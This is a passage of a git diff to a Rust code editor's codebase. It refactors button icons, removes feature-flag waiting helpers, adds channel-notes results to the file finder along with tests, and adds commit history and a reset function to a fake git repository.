+1477,11 @@ impl ExtensionsPage { } }); let open_registry_button = Button::new("open_registry", "Learn More") - .icon(IconName::ArrowUpRight) - .icon_size(IconSize::Small) - .icon_position(IconPosition::End) - .icon_color(Color::Muted) + .end_icon( + Icon::new(IconName::ArrowUpRight) + .size(IconSize::Small) + .color(Color::Muted), + ) .on_click({ move |_event, _window, cx| { telemetry::event!( @@ -1516,9 +1519,7 @@ impl ExtensionsPage { cx: &mut Context, ) -> impl IntoElement { let docs_url_button = Button::new("open_docs", "View Documentation") - .icon(IconName::ArrowUpRight) - .icon_size(IconSize::Small) - .icon_position(IconPosition::End) + .end_icon(Icon::new(IconName::ArrowUpRight).size(IconSize::Small)) .on_click({ move |_event, _window, cx| { telemetry::event!( diff --git a/crates/feature_flags/Cargo.toml b/crates/feature_flags/Cargo.toml index a25ca1629a539a87a7356f0419ef074e9546bc52..960834211ff18980675b236cd0cc2893d563d668 100644 --- a/crates/feature_flags/Cargo.toml +++ b/crates/feature_flags/Cargo.toml @@ -12,5 +12,4 @@ workspace = true path = "src/feature_flags.rs" [dependencies] -futures.workspace = true gpui.workspace = true diff --git a/crates/feature_flags/src/feature_flags.rs b/crates/feature_flags/src/feature_flags.rs index 1d1929ed4cf89abfc5304fa111dfc7ee523d5dd8..5b8af1180aae812ed1475810acc1920a8ec708f1 100644 --- a/crates/feature_flags/src/feature_flags.rs +++ b/crates/feature_flags/src/feature_flags.rs @@ -3,12 +3,8 @@ mod flags; use std::cell::RefCell; use std::rc::Rc; use std::sync::LazyLock; -use std::time::Duration; -use std::{future::Future, pin::Pin, task::Poll}; -use futures::channel::oneshot; -use futures::{FutureExt, select_biased}; -use gpui::{App, Context, Global, Subscription, Task, Window}; +use gpui::{App, Context, Global, Subscription, Window}; pub use flags::*; @@ -122,11 +118,6 @@ pub struct OnFlagsReady { } pub trait FeatureFlagAppExt { - fn wait_for_flag(&mut self) -> WaitForFlag; - - /// Waits for the specified feature flag to resolve, up to the given timeout. - fn wait_for_flag_or_timeout(&mut self, timeout: Duration) -> Task; - fn update_flags(&mut self, staff: bool, flags: Vec); fn set_staff(&mut self, staff: bool); fn has_flag(&self) -> bool; @@ -192,54 +183,4 @@ impl FeatureFlagAppExt for App { callback(feature_flags.has_flag::(), cx); }) } - - fn wait_for_flag(&mut self) -> WaitForFlag { - let (tx, rx) = oneshot::channel::(); - let mut tx = Some(tx); - let subscription: Option; - - match self.try_global::() { - Some(feature_flags) => { - subscription = None; - tx.take().unwrap().send(feature_flags.has_flag::()).ok(); - } - None => { - subscription = Some(self.observe_global::(move |cx| { - let feature_flags = cx.global::(); - if let Some(tx) = tx.take() { - tx.send(feature_flags.has_flag::()).ok(); - } - })); - } - } - - WaitForFlag(rx, subscription) - } - - fn wait_for_flag_or_timeout(&mut self, timeout: Duration) -> Task { - let wait_for_flag = self.wait_for_flag::(); - - self.spawn(async move |cx| { - let mut wait_for_flag = wait_for_flag.fuse(); - let mut timeout = FutureExt::fuse(cx.background_executor().timer(timeout)); - - select_biased! { - is_enabled = wait_for_flag => is_enabled, - _ = timeout => false, - } - }) - } -} - -pub struct WaitForFlag(oneshot::Receiver, Option); - -impl Future for WaitForFlag { - type Output = bool; - - fn poll(mut self: Pin<&mut Self>, cx: &mut core::task::Context<'_>) -> Poll { - self.0.poll_unpin(cx).map(|result| { - self.1.take(); - result.unwrap_or(false) - }) - } } diff --git a/crates/feature_flags/src/flags.rs b/crates/feature_flags/src/flags.rs index 087e76c4129254d3b6f488259bc8fa19aa91370d..54dc96ad37f8e51a1074a0a32976f8236cb1a0ed 100644 --- a/crates/feature_flags/src/flags.rs +++ b/crates/feature_flags/src/flags.rs @@ -37,36 +37,40 @@ impl FeatureFlag for AgentSharingFeatureFlag { const NAME: &'static str = "agent-sharing"; } -pub struct SubagentsFeatureFlag; +pub struct DiffReviewFeatureFlag; -impl FeatureFlag for SubagentsFeatureFlag { - const NAME: &'static str = "subagents"; +impl FeatureFlag for DiffReviewFeatureFlag { + const NAME: &'static str = "diff-review"; fn enabled_for_staff() -> bool { - true + false } } -pub struct DiffReviewFeatureFlag; +pub struct StreamingEditFileToolFeatureFlag; -impl FeatureFlag for DiffReviewFeatureFlag { - const NAME: &'static str = "diff-review"; +impl FeatureFlag for StreamingEditFileToolFeatureFlag { + const NAME: &'static str = "streaming-edit-file-tool"; fn enabled_for_staff() -> bool { - false + true } } -pub struct GitGraphFeatureFlag; +pub struct UpdatePlanToolFeatureFlag; -impl FeatureFlag for GitGraphFeatureFlag { - const NAME: &'static str = "git-graph"; +impl FeatureFlag for UpdatePlanToolFeatureFlag { + const NAME: &'static str = "update-plan-tool"; + + fn enabled_for_staff() -> bool { + false + } } -pub struct StreamingEditFileToolFeatureFlag; +pub struct ProjectPanelUndoRedoFeatureFlag; -impl FeatureFlag for StreamingEditFileToolFeatureFlag { - const NAME: &'static str = "streaming-edit-file-tool"; +impl FeatureFlag for ProjectPanelUndoRedoFeatureFlag { + const NAME: &'static str = "project-panel-undo-redo"; fn enabled_for_staff() -> bool { false diff --git a/crates/feedback/Cargo.toml b/crates/feedback/Cargo.toml index 0a53a1b6f38d1af0a6b913d61969d4df105a6a10..c2279d778865cb819a5b0e2e494ad9d1e4470067 100644 --- a/crates/feedback/Cargo.toml +++ b/crates/feedback/Cargo.toml @@ -22,5 +22,3 @@ util.workspace = true workspace.workspace = true zed_actions.workspace = true -[dev-dependencies] -editor = { workspace = true, features = ["test-support"] } diff --git a/crates/file_finder/Cargo.toml b/crates/file_finder/Cargo.toml index 8800c7cdcb86735e3b884bd7bd1fbbf5a0522174..5eb36f0f5150263629b407dbe07dc73b6eff31cf 100644 --- a/crates/file_finder/Cargo.toml +++ b/crates/file_finder/Cargo.toml @@ -14,6 +14,8 @@ doctest = false [dependencies] anyhow.workspace = true +channel.workspace = true +client.workspace = true collections.workspace = true editor.workspace = true file_icons.workspace = true @@ -26,7 +28,6 @@ picker.workspace = true project.workspace = true settings.workspace = true serde.workspace = true -text.workspace = true theme.workspace = true ui.workspace = true util.workspace = true @@ -38,10 +39,12 @@ project_panel.workspace = true ctor.workspace = true editor = { workspace = true, features = ["test-support"] } gpui = { workspace = true, features = ["test-support"] } -language = { workspace = true, features = ["test-support"] } + picker = { workspace = true, features = ["test-support"] } pretty_assertions.workspace = true serde_json.workspace = true theme = { workspace = true, features = ["test-support"] } workspace = { workspace = true, features = ["test-support"] } zlog.workspace = true +remote_connection = { workspace = true, features = ["test-support"] } +theme_settings = { workspace = true, features = ["test-support"] } \ No newline at end of file diff --git a/crates/file_finder/src/file_finder.rs b/crates/file_finder/src/file_finder.rs index a1e64964ff578ed263e9e89a610997423f33f7c0..4302669ddc11c94f7df128534217d00c27ef083a 100644 --- a/crates/file_finder/src/file_finder.rs +++ b/crates/file_finder/src/file_finder.rs @@ -4,10 +4,12 @@ mod file_finder_tests; use futures::future::join_all; pub use open_path_prompt::OpenPathDelegate; +use channel::ChannelStore; +use client::ChannelId; use collections::HashMap; use editor::Editor; use file_icons::FileIcons; -use fuzzy::{CharBag, PathMatch, PathMatchCandidate}; +use fuzzy::{CharBag, PathMatch, PathMatchCandidate, StringMatch, StringMatchCandidate}; use gpui::{ Action, AnyElement, App, Context, DismissEvent, Entity, EventEmitter, FocusHandle, Focusable, KeyContext, Modifiers, ModifiersChangedEvent, ParentElement, Render, Styled, Task, WeakEntity, @@ -33,7 +35,6 @@ use std::{ atomic::{self, AtomicBool}, }, }; -use text::Point; use ui::{ ButtonLike, ContextMenu, HighlightedLabel, Indicator, KeyBinding, ListItem, ListItemSpacing, PopoverMenu, PopoverMenuHandle, TintColor, Tooltip, prelude::*, @@ -45,8 +46,8 @@ use util::{ rel_path::RelPath, }; use workspace::{ - ModalView, OpenOptions, OpenVisible, SplitDirection, Workspace, item::PreviewTabsSettings, - notifications::NotifyResultExt, pane, + ModalView, OpenChannelNotesById, OpenOptions, OpenVisible, SplitDirection, Workspace, + item::PreviewTabsSettings, notifications::NotifyResultExt, pane, }; use zed_actions::search::ToggleIncludeIgnored; @@ -321,7 +322,7 @@ impl FileFinder { if let Some(workspace) = delegate.workspace.upgrade() && let Some(m) = delegate.matches.get(delegate.selected_index()) { - let path = match &m { + let path = match m { Match::History { path, .. } => { let worktree_id = path.project.worktree_id; ProjectPath { @@ -334,6 +335,7 @@ impl FileFinder { path: m.0.path.clone(), }, Match::CreateNew(p) => p.clone(), + Match::Channel { .. } => return, }; let open_task = workspace.update(cx, move |workspace, cx| { workspace.split_path_preview(path, false, Some(split_direction), window, cx) @@ -392,6 +394,7 @@ pub struct FileFinderDelegate { file_finder: WeakEntity, workspace: WeakEntity, project: Entity, + channel_store: Option>, search_count: usize, latest_search_id: usize, latest_search_did_cancel: bool, @@ -450,13 +453,18 @@ struct Matches { matches: Vec, } -#[derive(Debug, PartialEq, Eq, PartialOrd, Ord, Clone)] +#[derive(Debug, Clone)] enum Match { History { path: FoundPath, panel_match: Option, }, Search(ProjectPanelOrdMatch), + Channel { + channel_id: ChannelId, + channel_name: SharedString, + string_match: StringMatch, + }, CreateNew(ProjectPath), } @@ -465,7 +473,7 @@ impl Match { match self { Match::History { path, .. } => Some(&path.project.path), Match::Search(panel_match) => Some(&panel_match.0.path), - Match::CreateNew(_) => None, + Match::Channel { .. } | Match::CreateNew(_) => None, } } @@ -479,7 +487,7 @@ impl Match { .read(cx) .absolutize(&path_match.path), ), - Match::CreateNew(_) => None, + Match::Channel { .. } | Match::CreateNew(_) => None, } } @@ -487,7 +495,7 @@ impl Match { match self { Match::History { panel_match, .. } => panel_match.as_ref(), Match::Search(panel_match) => Some(panel_match), - Match::CreateNew(_) => None, + Match::Channel { .. } | Match::CreateNew(_) => None, } } } @@ -554,18 +562,21 @@ impl Matches { .extend(history_items.into_iter().map(path_to_entry)); return; }; - // If several worktress are open we have to set the worktree root names in path prefix - let several_worktrees = worktree_store.read(cx).worktrees().count() > 1; - let worktree_name_by_id = several_worktrees.then(|| { - worktree_store - .read(cx) - .worktrees() - .map(|worktree| { - let snapshot = worktree.read(cx).snapshot(); - (snapshot.id(), snapshot.root_name().into()) - }) - .collect() - }); + + let worktree_name_by_id = if should_hide_root_in_entry_path(&worktree_store, cx) { + None + } else { + Some( + worktree_store + .read(cx) + .worktrees() + .map(|worktree| { + let snapshot = worktree.read(cx).snapshot(); + (snapshot.id(), snapshot.root_name().into()) + }) + .collect(), + ) + }; let new_history_matches = matching_history_items( history_items, currently_opened, @@ -628,7 +639,6 @@ impl Matches { (_, Match::CreateNew(_)) => return cmp::Ordering::Greater, _ => {} } - debug_assert!(a.panel_match().is_some() && b.panel_match().is_some()); match (&a, &b) { // bubble currently opened files to the top @@ -651,32 +661,35 @@ impl Matches { } } - let a_panel_match = match a.panel_match() { - Some(pm) => pm, - None => { - return if b.panel_match().is_some() { - cmp::Ordering::Less - } else { - cmp::Ordering::Equal - }; + // For file-vs-file matches, use the existing detailed comparison. + if let (Some(a_panel), Some(b_panel)) = (a.panel_match(), b.panel_match()) { + let a_in_filename = Self::is_filename_match(a_panel); + let b_in_filename = Self::is_filename_match(b_panel); + + match (a_in_filename, b_in_filename) { + (true, false) => return cmp::Ordering::Greater, + (false, true) => return cmp::Ordering::Less, + _ => {} } - }; - let b_panel_match = match b.panel_match() { - Some(pm) => pm, - None => return cmp::Ordering::Greater, - }; + return a_panel.cmp(b_panel); + } - let a_in_filename = Self::is_filename_match(a_panel_match); - let b_in_filename = Self::is_filename_match(b_panel_match); + let a_score = Self::match_score(a); + let b_score = Self::match_score(b); + // When at least one side is a channel, compare by raw score. + a_score + .partial_cmp(&b_score) + .unwrap_or(cmp::Ordering::Equal) + } - match (a_in_filename, b_in_filename) { - (true, false) => return cmp::Ordering::Greater, - (false, true) => return cmp::Ordering::Less, - _ => {} // Both are filename matches or both are path matches + fn match_score(m: &Match) -> f64 { + match m { + Match::History { panel_match, .. } => panel_match.as_ref().map_or(0.0, |pm| pm.0.score), + Match::Search(pm) => pm.0.score, + Match::Channel { string_match, .. } => string_match.score, + Match::CreateNew(_) => 0.0, } - - a_panel_match.cmp(b_panel_match) } /// Determines if the match occurred within the filename rather than in the path @@ -786,6 +799,16 @@ fn matching_history_items<'a>( matching_history_paths } +fn should_hide_root_in_entry_path(worktree_store: &Entity, cx: &App) -> bool { + let multiple_worktrees = worktree_store + .read(cx) + .visible_worktrees(cx) + .filter(|worktree| !worktree.read(cx).is_single_file()) + .nth(1) + .is_some(); + ProjectPanelSettings::get_global(cx).hide_root && !multiple_worktrees +} + #[derive(Debug, Clone, PartialEq, Eq, PartialOrd, Ord, Hash)] struct FoundPath { project: ProjectPath, @@ -833,10 +856,16 @@ impl FileFinderDelegate { cx: &mut Context, ) -> Self { Self::subscribe_to_updates(&project, window, cx); + let channel_store = if FileFinderSettings::get_global(cx).include_channels { + ChannelStore::try_global(cx) + } else { + None + }; Self { file_finder, workspace, project, + channel_store, search_count: 0, latest_search_id: 0, latest_search_did_cancel: false, @@ -885,14 +914,12 @@ impl FileFinderDelegate { .currently_opened_path .as_ref() .map(|found_path| Arc::clone(&found_path.project.path)); - let worktrees = self - .project - .read(cx) - .worktree_store() + let worktree_store = self.project.read(cx).worktree_store(); + let worktrees = worktree_store .read(cx) .visible_worktrees_and_single_files(cx) .collect::>(); - let include_root_name = worktrees.len() > 1; + let include_root_name = !should_hide_root_in_entry_path(&worktree_store, cx); let candidate_sets = worktrees .into_iter() .map(|worktree| { @@ -971,6 +998,68 @@ impl FileFinderDelegate { path_style, ); + // Add channel matches + if let Some(channel_store) = &self.channel_store { + let channel_store = channel_store.read(cx); + let channels: Vec<_> = channel_store.channels().cloned().collect(); + if !channels.is_empty() { + let candidates = channels + .iter() + .enumerate() + .map(|(id, channel)| StringMatchCandidate::new(id, &channel.name)); + let channel_query = query.path_query(); + let query_lower = channel_query.to_lowercase(); + let mut channel_matches = Vec::new(); + for candidate in candidates { + let channel_name = candidate.string; + let name_lower = channel_name.to_lowercase(); + + let mut positions = Vec::new(); + let mut query_idx = 0; + for (name_idx, name_char) in name_lower.char_indices() { + if query_idx < query_lower.len() { + let query_char = + query_lower[query_idx..].chars().next().unwrap_or_default(); + if name_char == query_char { + positions.push(name_idx); + query_idx += query_char.len_utf8(); + } + } + } + + if query_idx == query_lower.len() { + let channel = &channels[candidate.id]; + let score = if name_lower == query_lower { + 1.0 + } else if name_lower.starts_with(&query_lower) { + 0.8 + } else { + 0.5 * (query_lower.len() as f64 / name_lower.len() as f64) + }; + channel_matches.push(Match::Channel { + channel_id: channel.id, + channel_name: channel.name.clone(), + string_match: StringMatch { + candidate_id: candidate.id, + score, + positions, + string: channel_name, + }, + }); + } + } + for channel_match in channel_matches { + match self + .matches + .position(&channel_match, self.currently_opened_path.as_ref()) + { + Ok(_duplicate) => {} + Err(ix) => self.matches.matches.insert(ix, channel_match), + } + } + } + } + let query_path = query.raw_query.as_str(); if let Ok(mut query_path) = RelPath::new(Path::new(query_path), path_style) { let available_worktree = self @@ -1056,17 +1145,8 @@ impl FileFinderDelegate { if let Some(panel_match) = panel_match { self.labels_for_path_match(&panel_match.0, path_style) } else if let Some(worktree) = worktree { - let multiple_folders_open = self - .project - .read(cx) - .visible_worktrees(cx) - .filter(|worktree| !worktree.read(cx).is_single_file()) - .nth(1) - .is_some(); - - let full_path = if ProjectPanelSettings::get_global(cx).hide_root - && !multiple_folders_open - { + let worktree_store = self.project.read(cx).worktree_store(); + let full_path = if should_hide_root_in_entry_path(&worktree_store, cx) { entry_path.project.path.clone() } else { worktree.read(cx).root_name().join(&entry_path.project.path) @@ -1095,6 +1175,16 @@ impl FileFinderDelegate { } } Match::Search(path_match) => self.labels_for_path_match(&path_match.0, path_style), + Match::Channel { + channel_name, + string_match, + .. + } => ( + channel_name.to_string(), + string_match.positions.clone(), + "Channel Notes".to_string(), + vec![], + ), Match::CreateNew(project_path) => ( format!("Create file: {}", project_path.path.display(path_style)), vec![], @@ -1479,6 +1569,16 @@ impl PickerDelegate for FileFinderDelegate { if let Some(m) = self.matches.get(self.selected_index()) && let Some(workspace) = self.workspace.upgrade() { + // Channel matches are handled separately since they dispatch an action + // rather than directly opening a file path. + if let Match::Channel { channel_id, .. } = m { + let channel_id = channel_id.0; + let finder = self.file_finder.clone(); + window.dispatch_action(OpenChannelNotesById { channel_id }.boxed_clone(), cx); + finder.update(cx, |_, cx| cx.emit(DismissEvent)).log_err(); + return; + } + let open_task = workspace.update(cx, |workspace, cx| { let split_or_open = |workspace: &mut Workspace, @@ -1571,6 +1671,7 @@ impl PickerDelegate for FileFinderDelegate { window, cx, ), + Match::Channel { .. } => unreachable!("handled above"), } }); @@ -1598,7 +1699,12 @@ impl PickerDelegate for FileFinderDelegate { active_editor .downgrade() .update_in(cx, |editor, window, cx| { - editor.go_to_singleton_buffer_point(Point::new(row, col), window, cx); + let Some(buffer) = editor.buffer().read(cx).as_singleton() else { + return; + }; + let buffer_snapshot = buffer.read(cx).snapshot(); + let point = buffer_snapshot.point_from_external_input(row, col); + editor.go_to_singleton_buffer_point(point, window, cx); }) .log_err(); } @@ -1627,7 +1733,7 @@ impl PickerDelegate for FileFinderDelegate { let path_match = self.matches.get(ix)?; - let history_icon = match &path_match { + let end_icon = match path_match { Match::History { .. } => Icon::new(IconName::HistoryRerun) .color(Color::Muted) .size(IconSize::Small) @@ -1636,6 +1742,10 @@ impl PickerDelegate for FileFinderDelegate { .flex_none() .size(IconSize::Small.rems()) .into_any_element(), + Match::Channel { .. } => v_flex() + .flex_none() + .size(IconSize::Small.rems()) + .into_any_element(), Match::CreateNew(_) => Icon::new(IconName::Plus) .color(Color::Muted) .size(IconSize::Small) @@ -1643,21 +1753,24 @@ impl PickerDelegate for FileFinderDelegate { }; let (file_name_label, full_path_label) = self.labels_for_match(path_match, window, cx); - let file_icon = maybe!({ - if !settings.file_icons { - return None; - } - let abs_path = path_match.abs_path(&self.project, cx)?; - let file_name = abs_path.file_name()?; - let icon = FileIcons::get_icon(file_name.as_ref(), cx)?; - Some(Icon::from_path(icon).color(Color::Muted)) - }); + let file_icon = match path_match { + Match::Channel { .. } => Some(Icon::new(IconName::Hash).color(Color::Muted)), + _ => maybe!({ + if !settings.file_icons { + return None; + } + let abs_path = path_match.abs_path(&self.project, cx)?; + let file_name = abs_path.file_name()?; + let icon = FileIcons::get_icon(file_name.as_ref(), cx)?; + Some(Icon::from_path(icon).color(Color::Muted)) + }), + }; Some( ListItem::new(ix) .spacing(ListItemSpacing::Sparse) .start_slot::(file_icon) - .end_slot::(history_icon) + .end_slot::(end_icon) .inset(true) .toggle_state(selected) .child( diff --git a/crates/file_finder/src/file_finder_tests.rs b/crates/file_finder/src/file_finder_tests.rs index c81d13420b179cc7ce0d8afd2aee26673673f09e..cd9cdeee1ff266717d380aeaecf7cbeb66ec8309 100644 --- a/crates/file_finder/src/file_finder_tests.rs +++ b/crates/file_finder/src/file_finder_tests.rs @@ -400,6 +400,18 @@ async fn test_absolute_paths(cx: &mut TestAppContext) { #[gpui::test] async fn test_complex_path(cx: &mut TestAppContext) { let app_state = init_test(cx); + + cx.update(|cx| { + let settings = *ProjectPanelSettings::get_global(cx); + ProjectPanelSettings::override_global( + ProjectPanelSettings { + hide_root: true, + ..settings + }, + cx, + ); + }); + app_state .fs .as_fake() @@ -509,6 +521,91 @@ async fn test_row_column_numbers_query_inside_file(cx: &mut TestAppContext) { }); } +#[gpui::test] +async fn test_row_column_numbers_query_inside_unicode_file(cx: &mut TestAppContext) { + let app_state = init_test(cx); + + let first_file_name = "first.rs"; + let first_file_contents = "aéøbcdef"; + app_state + .fs + .as_fake() + .insert_tree( + path!("/src"), + json!({ + "test": { + first_file_name: first_file_contents, + "second.rs": "// Second Rust file", + } + }), + ) + .await; + + let project = Project::test(app_state.fs.clone(), [path!("/src").as_ref()], cx).await; + + let (picker, workspace, cx) = build_find_picker(project, cx); + + let file_query = &first_file_name[..3]; + let file_row = 1; + let file_column = 5; + let query_inside_file = format!("{file_query}:{file_row}:{file_column}"); + picker + .update_in(cx, |finder, window, cx| { + finder + .delegate + .update_matches(query_inside_file.to_string(), window, cx) + }) + .await; + picker.update(cx, |finder, _| { + assert_match_at_position(finder, 1, &query_inside_file.to_string()); + let finder = &finder.delegate; + assert_eq!(finder.matches.len(), 2); + let latest_search_query = finder + .latest_search_query + .as_ref() + .expect("Finder should have a query after the update_matches call"); + assert_eq!(latest_search_query.raw_query, query_inside_file); + assert_eq!(latest_search_query.file_query_end, Some(file_query.len())); + assert_eq!(latest_search_query.path_position.row, Some(file_row)); + assert_eq!(latest_search_query.path_position.column, Some(file_column)); + }); + + cx.dispatch_action(Confirm); + + let editor = cx.update(|_, cx| workspace.read(cx).active_item_as::(cx).unwrap()); + cx.executor().advance_clock(Duration::from_secs(2)); + + let expected_column = first_file_contents + .chars() + .take(file_column as usize - 1) + .map(|character| character.len_utf8()) + .sum::(); + + editor.update(cx, |editor, cx| { + let all_selections = editor.selections.all_adjusted(&editor.display_snapshot(cx)); + assert_eq!( + all_selections.len(), + 1, + "Expected to have 1 selection (caret) after file finder confirm, but got: {all_selections:?}" + ); + let caret_selection = all_selections.into_iter().next().unwrap(); + assert_eq!( + caret_selection.start, caret_selection.end, + "Caret selection should have its start and end at the same position" + ); + assert_eq!( + file_row, + caret_selection.start.row + 1, + "Query inside file should get caret with the same focus row" + ); + assert_eq!( + expected_column, + caret_selection.start.column as usize, + "Query inside file should map user-visible columns to byte offsets for Unicode text" + ); + }); +} + #[gpui::test] async fn test_row_column_numbers_query_outside_file(cx: &mut TestAppContext) { let app_state = init_test(cx); @@ -1413,6 +1510,18 @@ async fn test_create_file_no_focused_with_multiple_worktrees(cx: &mut TestAppCon #[gpui::test] async fn test_path_distance_ordering(cx: &mut TestAppContext) { let app_state = init_test(cx); + + cx.update(|cx| { + let settings = *ProjectPanelSettings::get_global(cx); + ProjectPanelSettings::override_global( + ProjectPanelSettings { + hide_root: true, + ..settings + }, + cx, + ); + }); + app_state .fs .as_fake() @@ -1648,6 +1757,17 @@ async fn test_query_history(cx: &mut gpui::TestAppContext) { async fn test_history_match_positions(cx: &mut gpui::TestAppContext) { let app_state = init_test(cx); + cx.update(|cx| { + let settings = *ProjectPanelSettings::get_global(cx); + ProjectPanelSettings::override_global( + ProjectPanelSettings { + hide_root: true, + ..settings + }, + cx, + ); + }); + app_state .fs .as_fake() @@ -2148,6 +2268,17 @@ async fn test_toggle_panel_new_selections(cx: &mut gpui::TestAppContext) { async fn test_search_preserves_history_items(cx: &mut gpui::TestAppContext) { let app_state = init_test(cx); + cx.update(|cx| { + let settings = *ProjectPanelSettings::get_global(cx); + ProjectPanelSettings::override_global( + ProjectPanelSettings { + hide_root: true, + ..settings + }, + cx, + ); + }); + app_state .fs .as_fake() @@ -2253,6 +2384,17 @@ async fn test_search_preserves_history_items(cx: &mut gpui::TestAppContext) { async fn test_search_sorts_history_items(cx: &mut gpui::TestAppContext) { let app_state = init_test(cx); + cx.update(|cx| { + let settings = *ProjectPanelSettings::get_global(cx); + ProjectPanelSettings::override_global( + ProjectPanelSettings { + hide_root: true, + ..settings + }, + cx, + ); + }); + app_state .fs .as_fake() @@ -2736,6 +2878,17 @@ async fn test_selected_history_item_stays_selected_on_worktree_updated(cx: &mut async fn test_history_items_vs_very_good_external_match(cx: &mut gpui::TestAppContext) { let app_state = init_test(cx); + cx.update(|cx| { + let settings = *ProjectPanelSettings::get_global(cx); + ProjectPanelSettings::override_global( + ProjectPanelSettings { + hide_root: true, + ..settings + }, + cx, + ); + }); + app_state .fs .as_fake() @@ -2784,6 +2937,17 @@ async fn test_history_items_vs_very_good_external_match(cx: &mut gpui::TestAppCo async fn test_nonexistent_history_items_not_shown(cx: &mut gpui::TestAppContext) { let app_state = init_test(cx); + cx.update(|cx| { + let settings = *ProjectPanelSettings::get_global(cx); + ProjectPanelSettings::override_global( + ProjectPanelSettings { + hide_root: true, + ..settings + }, + cx, + ); + }); + app_state .fs .as_fake() @@ -3183,6 +3347,17 @@ async fn test_history_items_uniqueness_for_multiple_worktree_open_all_files( async fn test_selected_match_stays_selected_after_matches_refreshed(cx: &mut gpui::TestAppContext) { let app_state = init_test(cx); + cx.update(|cx| { + let settings = *ProjectPanelSettings::get_global(cx); + ProjectPanelSettings::override_global( + ProjectPanelSettings { + hide_root: true, + ..settings + }, + cx, + ); + }); + app_state.fs.as_fake().insert_tree("/src", json!({})).await; app_state @@ -3614,7 +3789,7 @@ async fn open_queried_buffer( fn init_test(cx: &mut TestAppContext) -> Arc { cx.update(|cx| { let state = AppState::test(cx); - theme::init(theme::LoadThemes::JustBase, cx); + theme_settings::init(theme::LoadThemes::JustBase, cx); super::init(cx); editor::init(cx); state @@ -3709,7 +3884,7 @@ impl SearchEntries { fn collect_search_matches(picker: &Picker) -> SearchEntries { let mut search_entries = SearchEntries::default(); for m in &picker.delegate.matches.matches { - match &m { + match m { Match::History { path: history_path, panel_match: path_match, @@ -3734,6 +3909,7 @@ fn collect_search_matches(picker: &Picker) -> SearchEntries search_entries.search_matches.push(path_match.0.clone()); } Match::CreateNew(_) => {} + Match::Channel { .. } => {} } } search_entries @@ -3768,6 +3944,7 @@ fn assert_match_at_position( Match::History { path, .. } => path.absolute.file_name().and_then(|s| s.to_str()), Match::Search(path_match) => path_match.0.path.file_name(), Match::CreateNew(project_path) => project_path.path.file_name(), + Match::Channel { channel_name, .. } => Some(channel_name.as_str()), } .unwrap(); assert_eq!(match_file_name, expected_file_name); @@ -3777,6 +3954,17 @@ fn assert_match_at_position( async fn test_filename_precedence(cx: &mut TestAppContext) { let app_state = init_test(cx); + cx.update(|cx| { + let settings = *ProjectPanelSettings::get_global(cx); + ProjectPanelSettings::override_global( + ProjectPanelSettings { + hide_root: true, + ..settings + }, + cx, + ); + }); + app_state .fs .as_fake() @@ -3821,6 +4009,18 @@ async fn test_filename_precedence(cx: &mut TestAppContext) { #[gpui::test] async fn test_paths_with_starting_slash(cx: &mut TestAppContext) { let app_state = init_test(cx); + + cx.update(|cx| { + let settings = *ProjectPanelSettings::get_global(cx); + ProjectPanelSettings::override_global( + ProjectPanelSettings { + hide_root: true, + ..settings + }, + cx, + ); + }); + app_state .fs .as_fake() diff --git a/crates/fs/Cargo.toml b/crates/fs/Cargo.toml index 6355524e4f328df0ca7fcf24c1df0557676ba6a6..371057c3f8abfd50eea34f0edfcc3e3f7d52df7b 100644 --- a/crates/fs/Cargo.toml +++ b/crates/fs/Cargo.toml @@ -48,6 +48,7 @@ cocoa = "0.26" [target.'cfg(target_os = "windows")'.dependencies] windows.workspace = true +dunce.workspace = true [target.'cfg(any(target_os = "linux", target_os = "freebsd"))'.dependencies] ashpd.workspace = true @@ -58,4 +59,4 @@ gpui = { workspace = true, features = ["test-support"] } git = { workspace = true, features = ["test-support"] } [features] -test-support = ["gpui/test-support", "git/test-support"] +test-support = ["gpui/test-support", "git/test-support", "util/test-support"] diff --git a/crates/fs/src/fake_git_repo.rs b/crates/fs/src/fake_git_repo.rs index 12cd67cdae1a250d07468047617c8cc7a52737fa..751796fb83164b78dc5d6789f0ae7870eff16ce1 100644 --- a/crates/fs/src/fake_git_repo.rs +++ b/crates/fs/src/fake_git_repo.rs @@ -8,8 +8,9 @@ use git::{ repository::{ AskPassDelegate, Branch, CommitDataReader, CommitDetails, CommitOptions, FetchOptions, GRAPH_CHUNK_SIZE, GitRepository, GitRepositoryCheckpoint, InitialGraphCommitData, LogOrder, - LogSource, PushOptions, Remote, RepoPath, ResetMode, Worktree, + LogSource, PushOptions, Remote, RepoPath, ResetMode, SearchCommitArgs, Worktree, }, + stash::GitStash, status::{ DiffTreeType, FileStatus, GitStatus, StatusCode, TrackedStatus, TreeDiff, TreeDiffStatus, UnmergedStatus, @@ -20,7 +21,7 @@ use ignore::gitignore::GitignoreBuilder; use parking_lot::Mutex; use rope::Rope; use smol::{channel::Sender, future::FutureExt as _}; -use std::{path::PathBuf, sync::Arc}; +use std::{path::PathBuf, sync::Arc, sync::atomic::AtomicBool}; use text::LineEnding; use util::{paths::PathStyle, rel_path::RelPath}; @@ -32,10 +33,19 @@ pub struct FakeGitRepository { pub(crate) dot_git_path: PathBuf, pub(crate) repository_dir_path: PathBuf, pub(crate) common_dir_path: PathBuf, + pub(crate) is_trusted: Arc, +} + +#[derive(Debug, Clone)] +pub struct FakeCommitSnapshot { + pub head_contents: HashMap, + pub index_contents: HashMap, + pub sha: String, } #[derive(Debug, Clone)] pub struct FakeGitRepositoryState { + pub commit_history: Vec, pub event_emitter: smol::channel::Sender, pub unmerged_paths: HashMap, pub head_contents: HashMap, @@ -52,7 +62,7 @@ pub struct FakeGitRepositoryState { pub simulated_create_worktree_error: Option, pub refs: HashMap, pub graph_commits: Vec>, - pub worktrees: Vec, + pub stash_entries: GitStash, } impl FakeGitRepositoryState { @@ -72,7 +82,8 @@ impl FakeGitRepositoryState { oids: Default::default(), remotes: HashMap::default(), graph_commits: Vec::new(), - worktrees: Vec::new(), + commit_history: Vec::new(), + stash_entries: Default::default(), } } } @@ -215,11 +226,52 @@ impl GitRepository for FakeGitRepository { fn reset( &self, - _commit: String, - _mode: ResetMode, + commit: String, + mode: ResetMode, _env: Arc>, ) -> BoxFuture<'_, Result<()>> { - unimplemented!() + self.with_state_async(true, move |state| { + let pop_count = if commit == "HEAD~" || commit == "HEAD^" { + 1 + } else if let Some(suffix) = commit.strip_prefix("HEAD~") { + suffix + .parse::() + .with_context(|| format!("Invalid HEAD~ offset: {commit}"))? + } else { + match state + .commit_history + .iter() + .rposition(|entry| entry.sha == commit) + { + Some(index) => state.commit_history.len() - index, + None => anyhow::bail!("Unknown commit ref: {commit}"), + } + }; + + if pop_count == 0 || pop_count > state.commit_history.len() { + 